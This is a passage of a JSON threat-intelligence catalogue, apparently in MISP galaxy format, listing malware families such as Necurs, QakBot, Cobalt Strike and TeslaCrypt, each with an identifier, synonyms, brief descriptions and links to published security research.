"b7dc52a1-7423-4a7a-a102-1df6122187ad", - "value": "DualToy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - } - }, - { - "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", - "value": "Lamdelin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" - ] - } - }, - { - "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", - "value": "PC Surveillance System", - "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", - "meta": { - "synonyms": [ - "PSS" - ], - "type": [], - "refs": [ - "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" - ] - } - }, - { - "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", - "value": "Kardon Loader", - "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", - "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" - ] - } - }, - { - "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", - "value": "WebC2-Table", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", - "value": "Sedreco", - "description": "", - "meta": { - "synonyms": [ - "eviltoss", - "azzy" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" - ] - } - }, - { - "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", - "value": "Buhtrap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/" - ] - } - }, - { - "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", - "value": "MacRansom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x1E.html", - "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" - ] - } - }, - { - "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", - "value": "Nagini", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" - ] - } - }, - { - "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", - "value": "OpGhoul", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" - ] - } - }, - { - "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", - "value": "Medre", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" - ] - } - }, - { - "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", - "value": "Shylock", - "description": "", - "meta": { - "synonyms": [ - "Caphaw" - ], - "type": [], - "refs": [ - "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", - "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", - "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", - "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", - "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", - "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" - ] - } - }, - { - "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", - "value": "ShellLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/813726714228604928" - ] - } - }, - { - "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", - "value": "Leverage", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", - "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" - ] - } - }, - { - "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", - "value": "Necurs", - "description": "", - "meta": { - "synonyms": [ - "nucurs" - ], - "type": [], - "refs": [ - "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", - "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", - "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", - "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", - "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" - ] - } - }, - { - "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", - "value": "Philadephia Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", - "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", - "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", - "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" - ] - } - }, - { - "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", - "value": "Evilbunny", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" - ] - } - }, - { - "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", - "value": "Cobalt Strike", - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/" - ] - } - }, - { - "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "win.medusa", - "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", - "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", - "https://news.drweb.com/show/?i=10302&lng=en", - "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" - ] - } - }, - { - "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", - "value": "HappyLocker (HiddenTear?)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", - "value": "win.glupteba", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://resources.infosecinstitute.com/tdss4-part-1/", - "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", - "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", - "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" - ] - } - }, - { - "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", - "value": "PoohMilk Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - } - }, - { - "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", - "value": "Romeo(Alfa,Bravo, ...)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", - "value": "xsPlus", - "description": "", - "meta": { - "synonyms": [ - "nokian" - ], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", - "value": "Bouncer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", - "value": "Combojack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" - ] - } - }, - { - "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", - "value": "StarCruft", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/operation-daybreak/75100/" - ] - } - }, - { - "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", - "value": "Ruckguv", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" - ] - } - }, - { - "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", - "value": "DuQu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" - ] - } - }, - { - "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", - "value": "CryptoWire", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" - ] - } - }, - { - "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", - "value": "BfBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", - "value": "Chinad", - "description": "Adware that shows advertisements using plugin techniques for popular browsers", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", - "value": "AvastDisabler", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" - ] - } - }, - { - "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", - "value": "Lurk", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" - ] - } - }, - { - "uuid": "4df1b257-c242-46b0-b120-591430066b6f", - "value": "POSHSPY", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", - "https://github.com/matthewdunwoody/POSHSPY" - ] - } - }, - { - "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", - "value": "IsSpace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - } - }, - { - "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", - "value": "QakBot", - "description": "", - "meta": { - "synonyms": [ - "Pinkslipbot", - "Qbot" - ], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf" - ] - } - }, - { - "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", - "value": "Silon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", - "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" - ] - } - }, - { - "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", - "value": "Tater PrivEsc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Kevin-Robertson/Tater" - ] - } - }, - { - "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", - "value": "JadeRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.lookout.com/mobile-threat-jaderat" - ] - } - }, - { - "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", - "value": "Stealth Mango", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.lookout.com/info/stealth-mango-report-ty" - ] - } - }, - { - "uuid": "acdda3e5-e776-419b-b060-14f3406de061", - "value": "WebC2-DIV", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", - "value": "TeslaCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.cisco.com/security/talos/teslacrypt", - "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", - "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", - "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" - ] - } - }, - { - "uuid": "47b67fa4-f32e-4b6b-a32d-42c5ca0b8e9a", - "value": "Wirenet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - } - }, - { - "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", - "value": "Mughthesec", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x20.html" - ] - } - }, - { - "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", - "value": "Uiwix", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" - ] - } - }, - { - "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", - "value": "Goggles", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", - "value": "Maktub", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", - "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", - "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" - ] - } - }, - { - "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", - "value": "Skyplex", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", - "value": "Slingshot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", - "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" - ] - } - }, - { - "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", - "value": "OceanLotus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" - ] - } - }, - { - "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", - "value": "Rincux", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", - "value": "BetaBot", - "description": "", - "meta": { - "synonyms": [ - "Neurevt" - ], - "type": [], - "refs": [ - "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", - "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", - "http://www.xylibox.com/2015/04/betabot-retrospective.html", - "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", - "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", - "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" - ] - } - }, - { - "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", - "value": "Babar", - "description": "", - "meta": { - "synonyms": [ - "SNOWBALL" - ], - "type": [], - "refs": [ - "http://www.spiegel.de/media/media-35683.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", - "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" - ] - } - }, - { - "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", - "value": "Alina POS", - "description": "", - "meta": { - "synonyms": [ - "alina_spark", - "katrina", - "alina_eagle" - ], - "type": [], - "refs": [ - "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://www.nuix.com/blog/alina-continues-spread-its-wings", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/" - ] - } - }, - { - "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", - "value": "Vobfus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" - ] - } - }, - { - "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", - "value": "Pony", - "description": "", - "meta": { - "synonyms": [ - "Fareit" - ], - "type": [], - "refs": [ - "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", - "https://github.com/nyx0/Pony" - ] - } - }, - { - "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", - "value": "Banjori", - "description": "", - "meta": { - "synonyms": [ - "MultiBanker 2", - "BankPatch", - "BackPatcher" - ], - "type": [], - "refs": [ - "http://blog.kleissner.org/?p=69", - "http://blog.kleissner.org/?p=192", - "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" - ] - } - }, - { - "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", - "value": "TeleDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", - "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" - ] - } - }, - { - "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", - "value": "Hacksfase", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", - "value": "HackSpy", - "description": "Py2Exe based tool as found on github.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/ratty3697/HackSpy-Trojan-Exploit" - ] - } - }, - { - "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", - "value": "Bart", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", - "value": "Fireball", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" - ] - } - }, - { - "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", - "value": "StarLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - } - }, - { - "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", - "value": "MadMax", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/mad-max-dga/" - ] - } - }, - { - "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", - "value": "scanbox", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", - "http://resources.infosecinstitute.com/scanbox-framework/" - ] - } - }, - { - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", - "https://twitter.com/PhysicalDrive0/status/845009226388918273", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" - ] - } - }, - { - "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", - "value": "Mirage", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] - } - }, - { - "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", - "value": "FastPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", - "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", - "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" - ] - } - }, - { - "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", - "value": "ArdaMax", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "4c74c8e1-869e-46a5-b050-e5a551484adc", - "value": "Razy", - "description": "", - "meta": { - "synonyms": [ - "xcmkds" - ], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/816915354698076161" - ] - } - }, - { - "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", - "value": "Catelites", - "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", - "https://www.youtube.com/watch?v=1LOy0ZyjEOk" - ] - } - }, - { - "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", - "value": "Unidentified 038", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", - "value": "ShadowPad", - "description": "", - "meta": { - "synonyms": [ - "XShellGhost" - ], - "type": [], - "refs": [ - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" - ] - } - }, - { - "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", - "value": "Vawtrak", - "description": "", - "meta": { - "synonyms": [ - "NeverQuest" - ], - "type": [], - "refs": [ - "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf" - ] - } - }, - { - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" - ] - } - }, - { - "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", - "value": "BadNews", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" - ] - } - }, - { - "uuid": "799921d7-48e8-47a6-989e-487b527af37a", - "value": "Unidentified 032", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" - ] - } - }, - { - "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", - "value": "BONDUPDATER", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 